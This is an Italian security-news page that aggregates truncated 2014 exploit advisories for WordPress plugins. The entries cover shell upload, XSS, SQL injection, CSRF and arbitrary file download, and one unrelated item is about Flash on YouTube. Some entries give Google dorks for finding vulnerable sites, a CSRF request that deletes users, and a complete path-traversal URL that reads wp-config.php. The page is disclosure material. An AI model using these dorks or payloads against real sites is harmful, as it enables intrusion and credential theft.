WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress Photo Album Plus 5.4.4 Cross Site Scripting

15 settembre 2014 - Fonte: http://www.mondounix.com
WP Photo Album Plus Security Vulnerabilities
 
Author: Milhouse 
Download: https://wordpress.org/plugins/wp-photo-album-plus/
Home Page: http://wppa.opajaap.nl/
Google dork: inurl:wp-content/plugins/wp-photo-album-plus
 
Set up:
Wordpress Version: 3.9.1, 3.9.2
WP Photo Album Plus version: 5.4.4, 5.4.3
Client browsers: FireFox 31, Internet Explorer 8-11
 
Issue number 1: A Cross-Site Scripting (reflective) vulnerability.
Details:
The plugin echoes the value of  the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. 
 
Severity: Low
 
Proof of Concept (POC):
Request:
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent:...

Leggi il seguito »

Ripritino di Flash Player Plug-in su Youtube (da Firefox 33)

13 settembre 2014 - Fonte: http://www.osside.net

uacontrol18
Molti di voi avranno notato che YouTube ha forzato gli utilizzatori di Firefox 33 e versioni superiori ad usare HTML5 per riprodurre i suoi video.

Premetto che sono più che favorevole ad HTML5 e all’abbandono del plugin proprietario di Adobe ma talvolta può essere necessario tornare al metodo “classico”.

Ecco un pratico sistema che ci permetterà di continuare ad utilizzare il Plug-in Flash...

Leggi il seguito »

WordPress Plugin Vulnerability Dump – Part 2

10 settembre 2014 - Fonte: http://www.mondounix.com
More vulnerabilities in poorly coded plugins for y'all.
 
Ninja Forms v2.77 - Authorization bypass (regular users can delete forms, etc)
Contact Form v3.83 - Email header injection
WP to Twitter v2.9.3 - Authorization bypass (regular users can tweet to the admin's twitter account)
Xhanch - My Twitter v2.7.7 - CSRF (create and delete tweets)
TinyMCE Advanced v4.1 - (insignificant) CSRF
W3 Total Cache v0.9.4 - (minor) CSRF
WordPress Download Manager v2.6.92 - Authorization bypass (regular users can upload/delete arbitrary files, yes, even 
php files)
Wordfence Security v5.2.2 - Stored XSS
 
Details and POCs located: https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
 
More to follow.
 
-Voxel...

Leggi il seguito »

WordPress Spider Facebook 1.0.8 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Spider Facebook 1.0.8 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php
 
######################
 
# Vulnerable code :
 
function Spider_Facebook_manage()
{
        require_once("facebook_manager.php");
        require_once("facbook_manager.html.php");
...

Leggi il seguito »

WordPress Like Dislike Counter 1.2.3 SQL Injection

9 settembre 2014 - Fonte: http://www.mondounix.com
#################################################################################################
#
# Title                : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability
# Risk                 : High+/Critical
# Exploit Author       : XroGuE
# Google Dork          : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php  AND  plugins/pro-like-dislike-counter/ldc-ajax-counter.php
# Plugin Version       : 1.2.3
# Plugin Name          : Like Dislike Counter
# Plugin Download Link : http://downloads.wordpress.org/plugin/like-dislike-counter-for-posts-pages-and-comments.zip
# Vendor Home          : www.wpfruits.com
# Date                 : 2014/09/05
# Tested in            : Win7 - Linux
#
##################################################################################################
#...

Leggi il seguito »

WordPress Bulk Delete Users By Email 1.0 CSRF

9 settembre 2014 - Fonte: http://www.mondounix.com
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result,...

Leggi il seguito »

WordPress Advanced Access Manager 2.8.2 File Write / Code Execution

4 settembre 2014 - Fonte: http://www.mondounix.com
Details
================
Software: Advanced Access Manager
Version: 2.8.2
Homepage: http://wordpress.org/plugins/advanced-access-manager/
Advisory report: https://security.dxw.com/advisories/advanced-access-manager-allows-admin-users-to-write-arbitrary-text-to-arbitrary-locations-which-could-lead-to-arbitrary-code-execution-etc/
CVE: CVE-2014-6059
CVSS: 6.5 (Medium; AV:N/AC:L/Au:S/C:P/I:P/A:P)
 
Description
================
Advanced Access Manager allows admin users to write arbitrary files and execute arbitrary php
 
Vulnerability
================
Advanced Access Manager allows writing arbitrary content to arbitrary files. Depending on the server configuration this could allow arbitrary code execution, overwriting core...

Leggi il seguito »

WordPress Huge IT Image Gallery 1.0.0 SQL Injection

3 settembre 2014 - Fonte: http://www.mondounix.com
######################
# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://huge-it.com/
 
# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
    Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
 
# Date : 2014-08-25
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
#             Linux / sqlmap 1.0-dev-5b2ded0
 
######################
 
# Location :  
http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
 
######################
 
# Vulnerable code :
 
function editgallery($id)
...

Leggi il seguito »

WordPress KenBurner Slider Arbitrary File Download

26 agosto 2014 - Fonte: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The Wordpress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...

Leggi il seguito »